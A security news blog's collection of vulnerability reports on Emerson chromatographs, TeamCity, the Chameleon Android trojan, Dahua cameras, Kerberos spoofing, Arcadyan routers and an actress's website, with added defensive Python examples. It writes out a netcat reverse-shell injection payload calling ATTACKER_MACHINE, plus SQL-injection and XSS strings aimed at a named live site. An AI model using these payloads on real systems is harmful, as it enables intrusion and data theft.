Posts with label: Authentication Bypass

Critical Vulnerabilities in Emerson Gas Chromatographs Expose Sensitive Data

 

Researchers have discovered multiple critical vulnerabilities in Emerson gas chromatographs that could allow malicious actors to access sensitive data, cause denial-of-service conditions, and execute arbitrary commands. 

Gas chromatographs, essential for analyzing and separating chemical compounds, are widely used in various industries, including chemical, environmental, and healthcare sectors. The Emerson Rosemount 370XA, a popular model, uses a proprietary protocol for communication between the device and the technician's computer.

Claroty's Team82, a security research group specializing in operational technology, identified four significant vulnerabilities: two command injection flaws, an authentication bypass, and an authorization vulnerability. One of the command injection flaws received a CVSS v3 score of 9.8, marking it as critically severe.

The first vulnerability, tracked as CVE-2023-46687, is an unauthenticated remote code execution flaw, specifically an OS command injection, in the implementation of the "forced calibration" command. The handler builds a shell command string that includes a user-supplied file name and passes it to the system function without sanitisation, so shell metacharacters in the file name are interpreted by the shell rather than treated as part of the name.

An attacker can exploit this by supplying a crafted file name such as gunzip -c ;nc -e /bin/sh ATTACKER_MACHINE 1337;> name_of_the_expanded_file. The semicolons terminate the intended gunzip command, and the shell runs the injected nc reverse shell as a separate command, giving arbitrary code execution in the root shell context. The nc -e form only works with netcat builds that support it (such as BusyBox nc, common on embedded Linux); the injection point, not this particular payload, is what matters.

The second vulnerability, CVE-2023-51761, is an authentication bypass that enables an attacker to bypass authentication by calculating a secret passphrase to reset the administrator password. The passphrase, derived from the device's MAC address, can be easily obtained. By understanding the passphrase validation process, an attacker can generate the passphrase using the MAC address and log in with administrator privileges using credentials formatted as EMERSON/{PASSPHRASE}.

Another flaw, CVE-2023-49716, involves a user login bypass via a password reset mechanism, allowing an unauthenticated user with network access to bypass authentication and gain admin capabilities.

The final vulnerability, CVE-2023-43609, is a command injection via reboot functionality, enabling an authenticated user with network access to execute arbitrary commands from a remote computer.

Due to the high cost and difficulty of acquiring a physical device, researchers emulated the Emerson Rosemount 370XA for their analysis. They discovered flaws in the device's protocol implementation, which allowed them to craft payloads and uncover the vulnerabilities.

The authentication bypass vulnerability, for example, allowed attackers to calculate a secret passphrase and reset administrator passwords, compromising system security.

In response to these findings, Emerson issued a security advisory recommending that users update the firmware on their devices. The Cybersecurity and Infrastructure Security Agency also released an advisory regarding these vulnerabilities.


TeamCity Software Vulnerability Exploited Globally

 


Over the past few days, attackers have been exploiting a critical flaw in TeamCity On-Premises that lets them create unauthorised administrator accounts. The flaw, tracked as CVE-2024-27198, prompted urgent action from JetBrains, which released a fix on March 4.

The scale of the problem is evident: attackers are exploiting the vulnerability broadly, creating hundreds of unauthorised users on TeamCity instances that have not yet received the update. According to LeakIX, a search engine that indexes exposed services and their vulnerabilities, over 1,700 TeamCity servers remain unpatched. Vulnerable hosts are concentrated in Germany, the United States, and Russia, and 1,440 instances have already been compromised.

On March 5, GreyNoise, a company analysing internet scanning traffic, detected a notable surge in attempts to exploit CVE-2024-27198. The majority of these attempts originated from systems in the United States, particularly those utilising the DigitalOcean hosting infrastructure.

These compromised TeamCity servers are not mere inconveniences; they serve as vital production machines used for building and deploying software. This presents a significant risk of supply-chain attacks, as the compromised servers may contain sensitive information, including crucial credentials for environments where code is deployed, published, or stored.

Rapid7, the security company that reported the flaw, highlighted its severity. The vulnerability carries a critical CVSS score of 9.8 out of 10 and affects all TeamCity On-Premises releases prior to 2023.11.4. It allows a remote, unauthenticated attacker to take control of a vulnerable server with administrative privileges.

JetBrains responded swiftly to the report by releasing TeamCity version 2023.11.4 on March 4, featuring a fix for CVE-2024-27198. They are urging all TeamCity users to update their instances to the latest version immediately to mitigate the risks associated with this critical vulnerability.

Given the observed widespread exploitation, administrators of on-premises TeamCity instances should install the newest release immediately. Because the flaw was exploited before patches were widely applied, patching alone is not enough: check for administrator accounts you did not create, review recent configuration changes, and rotate any credentials and tokens stored on the server, since a compromised build server exposes everything it can deploy to.

The discovery of this critical flaw in TeamCity has far-reaching implications, because build servers sit at the start of the software supply chain. Users should update their TeamCity instances promptly to close off unauthorised access and the supply-chain attacks that follow from it.
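As an added example (not JetBrains' or Rapid7's code), the Python below does two things an on-premises administrator needs during an event like this: it triages TeamCity version strings against the first fixed release, and it scans an audit trail for bursts of account creation, the pattern the mass exploitation left behind. The audit line format and the entries are constructed for the example; TeamCity's real audit log differs.

```python
import re
from datetime import datetime

# First TeamCity On-Premises release that fixes CVE-2024-27198 (from the advisory).
FIXED_VERSION = (2023, 11, 4)


def parse_version(version: str) -> tuple:
    """Turn strings such as '2023.11.3 (build 12345)' or '2023.05' into a
    comparable (year, release, patch) tuple; missing components count as 0."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version: str) -> bool:
    """True when the server still needs the CVE-2024-27198 fix."""
    return parse_version(version) < FIXED_VERSION


# Constructed audit lines for this example (not TeamCity's real log format):
# "<ISO timestamp> <event> key=value ...". One normal onboarding on March 4,
# then six accounts created within two minutes by an unexpected actor.
CONSTRUCTED_AUDIT = """\
2024-03-04T09:12:41Z user_created actor=jdoe new_user=build-bot-7
2024-03-05T02:10:03Z user_created actor=guest new_user=qa4zx1
2024-03-05T02:10:05Z user_created actor=guest new_user=p0x9m
2024-03-05T02:10:09Z user_created actor=guest new_user=zz1k
2024-03-05T02:10:12Z user_created actor=guest new_user=hq7tt
2024-03-05T02:10:14Z user_created actor=guest new_user=m2n2n
2024-03-05T02:11:40Z user_created actor=guest new_user=r8vv
2024-03-05T08:30:00Z login actor=jdoe result=ok
"""

LINE = re.compile(r"^(\S+) user_created actor=(\S+) new_user=(\S+)$")


def find_creation_bursts(audit_text: str, window_seconds: int = 600, threshold: int = 5) -> list:
    """Names of accounts created inside any window of `window_seconds` that
    holds at least `threshold` creations. Isolated onboarding is ignored."""
    events = []
    for line in audit_text.splitlines():
        m = LINE.match(line)
        if m:
            ts = datetime.fromisoformat(m.group(1).replace("Z", "+00:00"))
            events.append((ts, m.group(3)))
    events.sort()
    flagged, j = set(), 0
    for i in range(len(events)):              # sliding window over sorted events
        while j < len(events) and (events[j][0] - events[i][0]).total_seconds() <= window_seconds:
            j += 1
        if j - i >= threshold:
            flagged.update(name for _, name in events[i:j])
    return sorted(flagged)


if __name__ == "__main__":
    for v in ("2023.11.3 (build 12345)", "2023.11.4", "2024.03"):
        print(v, "->", "AFFECTED" if is_affected(v) else "fixed")
    print("accounts created in a burst:", find_creation_bursts(CONSTRUCTED_AUDIT))
```

Any account the burst scan flags should be treated as attacker-created until proven otherwise; disable it, then look at what it did after creation (project access, token generation, build configuration edits).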



New Chameleon Android Trojan Can Bypass Biometric Security

 

A brand new variant of the Chameleon Android malware has been discovered in the wild, featuring new characteristics, the most notable of which is the ability to bypass fingerprint locks.

The Chameleon Android banking malware first appeared in early 2023, primarily targeting mobile banking apps in Australia and Poland, and has since spread to other countries, including the UK and Italy. Early builds relied on multiple loggers (keylogging and overlay injection) but offered limited functionality beyond that.

Earlier versions of Chameleon could perform actions on the victim's behalf, allowing those behind the malware to carry out account and device takeover attacks. Chameleon has usually leveraged the Android Accessibility Service to extract sensitive data from endpoints and mount overlay attacks, ThreatFabric researchers explained.

The updated version adds two features: the ability to circumvent biometric prompts, and an HTML page that walks the victim through enabling the Accessibility Service on Android 13 devices, where the "Restricted Settings" feature otherwise blocks sideloaded apps from being granted it. According to the researchers, the new variant's complexity and adaptability make it a more potent threat in the constantly evolving field of mobile banking trojans.

The new Chameleon variant starts by checking whether the operating system is Android 13 or newer. If it is, the malware prompts the user to enable accessibility services, guiding them through the procedure. Once that is done, the malware can perform unauthorised actions on the user's behalf.

While abusing the Accessibility Service is common across malware families, what makes this variant notable is that it interferes with the device's biometric prompts to get around fingerprint locks.

The method uses the AccessibilityEvent system-level event for Android and the KeyguardManager application programming interface to determine the screen and keyguard state based on UI changes. Keyguard is an Android system component that controls security features on devices, including screen lock and authentication mechanisms. 

The malware assesses the keyguard state in terms of the various lock methods (pattern, PIN, or password). When specific conditions are met, it uses an AccessibilityEvent action to switch the prompt from biometric to PIN authentication. This sidesteps the biometric prompt, so the trojan can unlock the device whenever it wants using a PIN or password it has already captured.

The technique gives the operators two advantages: forcing a fallback to PIN, password, or pattern entry makes those secrets available to the trojan's keylogger, and the captured credentials can later be used to unlock the device at will.

“The emergence of the new Chameleon banking trojan is another example of the sophisticated and adaptive threat landscape within the Android ecosystem,” the researchers concluded. “Evolving from its earlier iteration, this variant demonstrates increased resilience and advanced new features.”

Unpatched Dahua Cameras are Prone to Authentication Bypass Vulnerabilities

 

Two authentication bypass vulnerabilities affect unpatched Dahua cameras, and a proof-of-concept exploit published on 7 October makes upgrading urgent. Both CVE-2021-33044 and CVE-2021-33045 can be exploited remotely during the login process by sending specially crafted packets to the target device.

This comes a month after Dahua issued a security advisory urging owners of vulnerable models to update their firmware, but given how often these devices are forgotten after initial setup and installation, many are likely still running an old, vulnerable version. The list of affected models is long and includes thermal cameras as well as conventional ones.

Separately, in 2019 IPVM confirmed, based on its own tests and information from Dahua, that numerous Dahua cameras had a wiretapping flaw: an unauthenticated attacker could listen to the camera's audio even when audio was disabled in its settings.

Dahua's security and R&D teams ran an emergency investigation at the time, with these preliminary findings:

 • Unauthorised download vulnerability in video chat: this vulnerability no longer exists in current code because the relevant functional modules were refactored, though some end-of-life (EOL) products may still be exposed.

 • Replay attack vulnerability: this was a newly discovered vulnerability affecting several Dahua products.

Dahua spokesperson Tim Shen said, "Dahua uses the secure login authentication method “Digest” by default, but in order to be compatible with early devices, we also retain support for the login authentication method with insufficient security. This vulnerability just exploits these insecure login authentication methods." 
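The mechanism Shen describes, in its standard RFC 2617 form, as an added Python example (not Dahua's login protocol or its firmware): a client computes a Digest response, and a server that tracks the nonce-count per nonce refuses a replayed header and refuses any non-Digest scheme outright, which is the legacy fallback the quote above is about. Realm, user, password and URI are constructed for the example.

```python
import hashlib
import hmac
import secrets


def _md5(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def ha1(username: str, realm: str, password: str) -> str:
    """H(A1): what a server can store instead of the plaintext password."""
    return _md5(f"{username}:{realm}:{password}")


def digest_response(h_a1: str, method: str, uri: str, nonce: str, nc: int,
                    cnonce: str, qop: str = "auth") -> str:
    """RFC 2617 response for qop=auth. The server nonce, the nonce-count and the
    client nonce are all hashed in, which ties the value to one exchange."""
    h_a2 = _md5(f"{method}:{uri}")
    return _md5(f"{h_a1}:{nonce}:{nc:08x}:{cnonce}:{qop}:{h_a2}")


def client_authorization(username, password, realm, method, uri, nonce, nc) -> dict:
    """Fields a client sends in its Authorization header for one request."""
    cnonce = secrets.token_hex(8)
    return {
        "scheme": "Digest", "username": username, "realm": realm, "uri": uri,
        "nonce": nonce, "nc": f"{nc:08x}", "cnonce": cnonce, "qop": "auth",
        "response": digest_response(ha1(username, realm, password), method, uri, nonce, nc, cnonce),
    }


class DigestServer:
    """Verifier that accepts Digest only and remembers, per nonce, the highest
    nonce-count it has honoured, so a captured header cannot be replayed."""

    def __init__(self, realm: str, users: dict):  # users: constructed {username: password}
        self.realm = realm
        self.h_a1 = {u: ha1(u, realm, pw) for u, pw in users.items()}
        self.nonces = {}  # nonce -> highest nc accepted (expire these in real code)

    def challenge(self) -> str:
        nonce = secrets.token_hex(16)
        self.nonces[nonce] = 0
        return nonce

    def verify(self, method: str, auth: dict) -> str:
        """Return 'ok' or the reason the request is refused."""
        if auth.get("scheme") != "Digest":
            return "legacy scheme refused"        # no Basic / plaintext fallback
        nonce = auth.get("nonce")
        if nonce not in self.nonces:
            return "unknown nonce"
        nc = int(auth.get("nc", "0"), 16)
        if nc <= self.nonces[nonce]:
            return "replayed nonce-count"
        stored = self.h_a1.get(auth.get("username"))
        if stored is None:
            return "unknown user"
        expected = digest_response(stored, method, auth.get("uri", ""), nonce, nc,
                                   auth.get("cnonce", ""), auth.get("qop", "auth"))
        if not hmac.compare_digest(expected, auth.get("response", "")):
            return "bad response"
        self.nonces[nonce] = nc
        return "ok"


if __name__ == "__main__":
    srv = DigestServer("camera", {"admin": "correct-horse"})
    nonce = srv.challenge()
    auth = client_authorization("admin", "correct-horse", "camera", "GET", "/cgi-bin/status", nonce, 1)
    print("first use:", srv.verify("GET", auth))
    print("replayed:", srv.verify("GET", auth))
    print("Basic:", srv.verify("GET", {"scheme": "Basic", "credentials": "YWRtaW46Y29ycmVjdC1ob3JzZQ=="}))
```

Two caveats a practitioner should keep in mind: Digest is MD5-based, so a captured exchange still allows an offline dictionary attack on a weak password, and it protects only the login, not the video stream; both argue for TLS in front of the camera regardless of which login scheme the firmware keeps.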

The audio flaw was first reported to Dahua in May 2019 by Tenable research engineer Jacob Baines, who found it in the firmware of an Amcrest (Dahua OEM) camera (CVE-2019-3948, with a public proof of concept); it allowed unauthenticated access to the camera's audio stream.

Chinese surveillance camera maker Dahua Technology has been subject to US trade restrictions since October 2019, when the Department of Commerce added it to its Entity List. Even so, tens of thousands of Dahua cameras remain in use around the country, and some are not obviously Dahua: according to a report by The Intercept, many cameras sold in the United States under American or Canadian brands use Dahua hardware and, in some cases, Dahua firmware.

Kerberos Authentication Spoofing: A Quick Look

 

Since authentication is the first line of defence for security systems, if a threat actor gets past it, they can very much do whatever they want. Threat actors can log in as administrators and change configurations, get access to protected resources, and take control of appliances in order to steal sensitive data. 

Silverfort discovered that all four security systems they examined – Cisco ASA, F5 Big-IP, IBM QRadar, and Palo Alto Networks PAN-OS – were vulnerable to bypass vulnerabilities due to the way they implemented the Kerberos and LDAP authentication protocols. 

Kerberos originated at MIT's Project Athena in the 1980s; Microsoft adopted it as the default authentication protocol for Active Directory domains with Windows 2000, and it has since become a standard building block for single sign-on across many platforms. The reference implementation is maintained by MIT, and implementations exist for macOS, FreeBSD, UNIX, and Linux.

The Kerberos authentication protocol works as follows:

 • The client sends an AS-REQ to the Key Distribution Center (KDC), naming the user and asking for a ticket-granting ticket (TGT).

 • The KDC verifies the request (with pre-authentication, by checking a timestamp encrypted under the user's key) and returns an AS-REP containing the TGT and a session key; the session key is encrypted under the user's key.

 • The TGT itself is encrypted under the Ticket Granting Service (TGS) key, the krbtgt key, which only the KDC holds; the client stores it but cannot read it.

 • To reach a service, the client presents the TGT to the TGS and receives a service ticket encrypted under that service's long-term key; the service decrypts it with the key in its keytab to verify the user. When the TGT expires, the client transparently requests a new one.

The four security systems above can use Kerberos without its SSO capabilities: the user types a username and password at login, and the system performs the AS exchange on their behalf to obtain a TGT. The security system is therefore both a Kerberos client (toward the KDC) and an authentication server (toward its own users). If it stops after the AS exchange and never completes the client/server exchange with a key of its own, it is open to KDC spoofing: an attacker who can redirect the system's KDC traffic (for example via DNS or routing) answers the AS-REQ with a reply encrypted under the password the attacker just typed, the reply decrypts successfully, and the login is accepted.
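A toy model of the spoofing, added here for illustration and not code from Silverfort or any of the four products: an honest KDC, a rogue KDC that knows only the password the attacker will type, and two appliance login routines. The one that stops after the AS exchange accepts the rogue reply; the one that also obtains a ticket for its own service principal and verifies it with its keytab key does not. The "encryption" is a SHA-256 keystream with an HMAC tag standing in for Kerberos' encrypted parts, and the realm, principals and passwords are constructed.

```python
import hashlib
import hmac
import os
from typing import Optional

SESSION_LEN = 32  # bytes of session key carried inside the toy TGT


def string_to_key(password: str, salt: str) -> bytes:
    """Stand-in for Kerberos string-to-key (real: PBKDF2 for AES, or RC4-HMAC)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt.encode(), 20_000)


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    return b"".join(hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
                    for i in range(n // 32 + 1))[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Toy authenticated encryption standing in for a Kerberos encrypted part."""
    nonce = os.urandom(16)
    ct = bytes(a ^ b for a, b in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, "sha256").digest()


def unseal(key: bytes, blob: bytes) -> Optional[bytes]:
    """None when the tag fails, i.e. the blob was not sealed with `key`."""
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(hmac.new(key, nonce + ct, "sha256").digest(), tag):
        return None
    return bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct))))


class KDC:
    """Honest KDC: knows every principal's long-term key and the krbtgt key."""

    def __init__(self, realm: str, passwords: dict):  # passwords: constructed {principal: password}
        self.realm = realm
        self.keys = {p: string_to_key(pw, realm + p) for p, pw in passwords.items()}
        self.krbtgt_key = os.urandom(32)

    def as_exchange(self, user: str):
        """AS-REQ -> AS-REP: TGT under the krbtgt key, session key under the user's key."""
        if user not in self.keys:
            return None
        session = os.urandom(SESSION_LEN)
        tgt = seal(self.krbtgt_key, b"TGT:" + user.encode() + session)
        return tgt, seal(self.keys[user], session)

    def tgs_exchange(self, tgt: bytes, service: str):
        """TGS-REQ -> TGS-REP: a service ticket sealed under the service's own key."""
        inner = unseal(self.krbtgt_key, tgt)
        if inner is None or service not in self.keys:
            return None
        user = inner[4:-SESSION_LEN]
        return seal(self.keys[service], b"TKT:" + user)


class RogueKDC:
    """Attacker's KDC, reached by redirecting the appliance's KDC traffic. It
    knows only the password the attacker will type, never the service key, so
    its AS-REP decrypts for the attacker but its tickets cannot verify."""

    def __init__(self, realm: str, typed_password: str):
        self.realm, self.typed_password = realm, typed_password

    def as_exchange(self, user: str):
        enc_part = seal(string_to_key(self.typed_password, self.realm + user), os.urandom(SESSION_LEN))
        return os.urandom(100), enc_part           # garbage "TGT" plus a decryptable enc part

    def tgs_exchange(self, tgt: bytes, service: str):
        return seal(os.urandom(32), b"TKT:anyone")  # sealed under a guessed key


def login_as_only(kdc, realm: str, user: str, password: str) -> bool:
    """Vulnerable pattern: the user is in once the AS-REP decrypts with the typed password."""
    rep = kdc.as_exchange(user)
    return rep is not None and unseal(string_to_key(password, realm + user), rep[1]) is not None


def login_with_service_check(kdc, realm, user, password, service, keytab_key) -> bool:
    """Fixed pattern: also obtain a ticket for our own service principal and
    verify it with the key from our keytab, which only the genuine KDC shares."""
    rep = kdc.as_exchange(user)
    if rep is None or unseal(string_to_key(password, realm + user), rep[1]) is None:
        return False
    ticket = kdc.tgs_exchange(rep[0], service)
    inner = unseal(keytab_key, ticket) if ticket is not None else None
    return inner == b"TKT:" + user.encode()
```

MIT Kerberos exposes exactly this check as krb5_verify_init_creds(), and the idea applies to any application that validates passwords through Kerberos: without a key of its own to verify a ticket against, it cannot tell a genuine KDC from one the attacker answers from.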

In the BIG-IP case, the KDC spoofing vulnerability allows an attacker to defeat Kerberos authentication on BIG-IP Access Policy Manager (APM), break the security restrictions it enforces, and obtain unrestricted access to the sensitive workloads behind it. Silverfort security researchers Yaron Kassner and Rotem Zach described it in a report.

F5 Networks released BIG-IP APM versions 12.1.6, 13.1.4, 14.1.4, and 15.1.3 with a fix for this vulnerability (CVE-2021-23008, CVSS score 8.1). As mitigations, the company suggested multi-factor authentication (MFA) or an IPsec tunnel between the affected BIG-IP APM system and the Active Directory servers, so that KDC traffic cannot be redirected to an attacker.

12-Year-Old Authentication Bypass Vulnerability Could Allow Network Compromise

 

At least 20 router models have been found to share a 12-year-old authentication bypass vulnerability that could allow attackers to hijack networks and devices, potentially affecting millions of users. The critical path traversal bug was discovered by Evan Grant of Tenable, is tracked as CVE-2021-20090 with a CVSS score of 9.8, and can be exploited by unauthenticated remote attackers. Grant found the problem in Buffalo routers, in the web interface firmware supplied by Arcadyan.

Grant found that bypass_check() compared only as many bytes of the requested path as the length of each bypass_list entry, so any request whose path merely began with an allowed prefix was treated as not requiring authentication. Combined with path traversal, that let unauthenticated users reach pages they should not be able to view. Two further vulnerabilities, CVE-2021-20091 and CVE-2021-20092, were also discovered, but those affect only specific Buffalo models.
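An added Python model of the bug class (not Arcadyan's firmware, whose bypass_list entries and page names are not given here; the allow-list below and the admin page name are hypothetical): the prefix-only check accepts any path that begins with an allowed directory, so a traversal sequence after the prefix reaches protected pages, while the same allow-list applied to the decoded, normalised path does not.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical allow-list of resources the router's web UI serves without a
# session, modelled on the bypass_list the write-up mentions (real entries differ).
BYPASS_LIST = ["images/", "js/", "css/", "login.html"]


def bypass_check_vulnerable(request_path: str) -> bool:
    """Prefix-only comparison of len(entry) bytes, on the raw request path."""
    path = request_path.lstrip("/")
    return any(path[:len(entry)] == entry for entry in BYPASS_LIST)


def canonical_path(request_path: str) -> str:
    """Percent-decode, then resolve '.' and '..' against the web root, so the
    check sees the path the file handler will actually open."""
    decoded = unquote(request_path)
    if "\x00" in decoded:
        raise ValueError("NUL in path")
    return posixpath.normpath("/" + decoded).lstrip("/")


def bypass_check_fixed(request_path: str) -> bool:
    """Same allow-list, applied to the canonical path: directories match only as
    a whole leading component, files only as an exact name."""
    try:
        path = canonical_path(request_path)
    except ValueError:
        return False
    for entry in BYPASS_LIST:
        if entry.endswith("/"):
            if path.startswith(entry):
                return True
        elif path == entry:
            return True
    return False


if __name__ == "__main__":
    for req in ("/images/logo.png", "/images/..%2fadmin/status.html",
                "/login.html.bak", "/admin/status.html"):
        print(f"{req:40} vulnerable={bypass_check_vulnerable(req)!s:5} "
              f"fixed={bypass_check_fixed(req)!s:5} opens={canonical_path(req)}")
```

The second request is the shape of the bypass: it starts with images/, so the prefix check waves it through, but after decoding and normalisation the file handler opens admin/status.html. The third shows the other weakness of byte-count comparison, a file name that merely begins with an allowed name. Authorisation must be decided on the same canonical path the server will open, never on the raw bytes of the request.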

According to Grant, this latest revelation raises concerns about the danger of supply chain attacks, which are becoming a more common and serious threat to businesses and technology users. “There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors,” Grant wrote. "Consequently, we were surprised they hadn’t been discovered and fixed by the manufacturer or vendors who are selling affected devices over the past decade." 

On Friday, just three days following the bug's disclosure, Juniper Networks cybersecurity researchers announced that they had detected active exploitation of the bug. “We have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,” they wrote in a post. “The attacker seems to be attempting to deploy a Mirai variant on the affected routers.”

Mirai is a long-running botnet that infects connected devices and uses them to launch distributed denial-of-service (DDoS) attacks. It first drew attention in 2016, when it overwhelmed the DNS provider Dyn and knocked over 1,200 websites offline, including Netflix and Twitter. Its source code was leaked later that year, which spawned numerous Mirai variants.

According to Juniper, several of the scripts used in the latest wave of assaults are similar to those used in prior attacks in February and March. “The similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,” researchers wrote.

Bollywood Actress Divya Dutta website vulnerable to critical vulnerabilities


Ravi Kariya, a Security Analyst from Cyber Octet Pvt. Ltd (facebook.com/cyberoctet) has discovered critical vulnerabilities in the official website (divyadutta.co.in) of famous Indian Actress Divya Dutta.

There are two SQL injection vulnerabilities in the website. One resides in the Press Clips page (divyadutta.co.in/pressclipdetail.asp?id=7); an attacker can exploit it to extract the database.

The other is more critical: it allows an attacker to bypass the login and sign in as admin (divyadutta.co.in/admin/) by submitting a crafted password that changes the SQL query so that it always matches.

There is also a cross-site scripting vulnerability in the contact page (divyadutta.co.in/contact.asp). Entering the following in the form fields and clicking submit executes the injected script:

"><script>alert('My Love For Divya Dutta')</script>
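As an added example (not the site's ASP code, whose queries are unknown), the Python below uses an in-memory SQLite table to show how a crafted password rewrites a string-built login query, the parameterised query that closes the hole, and the output escaping that neutralises the contact-form script above. The admin credential is constructed.

```python
import hmac
import html
import sqlite3

# Constructed credential for this example; the real site's data is unknown.
ADMIN_USER, ADMIN_PASSWORD = "admin", "correct-horse-battery"
CRAFTED_PASSWORD = "' OR '1'='1"                                      # classic login-bypass payload
XSS_PAYLOAD = "\"><script>alert('My Love For Divya Dutta')</script>"  # from the post above


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's admin table. Plaintext passwords are
    kept only so the vulnerable query reads like the original; real sites
    should store password hashes and compare the hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admins (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO admins VALUES (?, ?)", (ADMIN_USER, ADMIN_PASSWORD))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query. With the crafted password the WHERE clause becomes
    username='admin' AND password='' OR '1'='1', which is always true."""
    sql = f"SELECT 1 FROM admins WHERE username='{username}' AND password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the input is bound as data and never parsed as SQL,
    and the comparison happens in constant time on the application side."""
    row = conn.execute("SELECT password FROM admins WHERE username = ?", (username,)).fetchone()
    return row is not None and hmac.compare_digest(row[0], password)


def render_contact_echo(field_value: str) -> str:
    """Reflect form input into HTML with escaping, so the script payload is
    displayed as text instead of executing in the visitor's browser."""
    return f"<p>Thanks, {html.escape(field_value, quote=True)}</p>"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, crafted password:", login_vulnerable(db, "admin", CRAFTED_PASSWORD))
    print("fixed, crafted password:    ", login_fixed(db, "admin", CRAFTED_PASSWORD))
    print(render_contact_echo(XSS_PAYLOAD))
```

In classic ASP the equivalent fix is an ADODB.Command with parameters instead of string concatenation, plus Server.HTMLEncode on anything echoed back to the page.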




Ravi tried to contact Divya Dutta via email and Twitter, but she failed to respond to his query. It seems that she doesn't realise the severity of these security flaws. A black-hat hacker could deface the site using these vulnerabilities.

I think she will respond after some blackhats attack the site, what do you think guys?

*Update*
After E hacking news published news about the vulnerability, the admin pulled down the divya dutta site. Now the site displays the following error message:

"Directory Listing Denied. This Virtual Directory does not allow contents to be listed."